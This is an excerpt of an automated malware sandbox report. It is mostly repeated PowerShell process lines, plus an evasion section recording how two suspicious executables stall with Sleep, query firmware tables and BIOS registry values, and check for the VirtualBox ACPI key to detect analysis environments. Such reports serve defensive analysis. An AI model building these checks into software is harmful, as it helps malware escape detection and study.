                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Found stalling execution ending in API Sleep call
                              Source: C:\ProgramData\Program\iusb3mon.exeStalling execution: Execution stalls by calling Sleepgraph_28-35518
                              Query firmware table information (likely to detect VMs)
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSystem information queried: FirmwareTableInformation
                              Source: C:\ProgramData\Program\iusb3mon.exeSystem information queried: FirmwareTableInformation
                              Source: C:\ProgramData\Program\iusb3mon.exeSystem information queried: FirmwareTableInformation
                              Tries to delay execution (extensive OutputDebugStringW loop)
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: OutputDebugStringW count: 275
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: OutputDebugStringW count: 1926
                              Tries to detect sandboxes / dynamic malware analysis system (registry check)
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\Program\iusb3mon.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\ProgramData\Program\iusb3mon.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\ProgramData\Program\iusb3mon.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\ProgramData\Program\iusb3mon.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6122Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2172Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4179Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2169Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5577Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3924
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3058
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3925
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 677
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeWindow / User API: threadDelayed 394
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeWindow / User API: threadDelayed 8360
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 703
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2688
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3445
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1510
                              Source: C:\ProgramData\Program\iusb3mon.exeWindow / User API: threadDelayed 2027
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5301
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3436
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3347
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2932
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 780
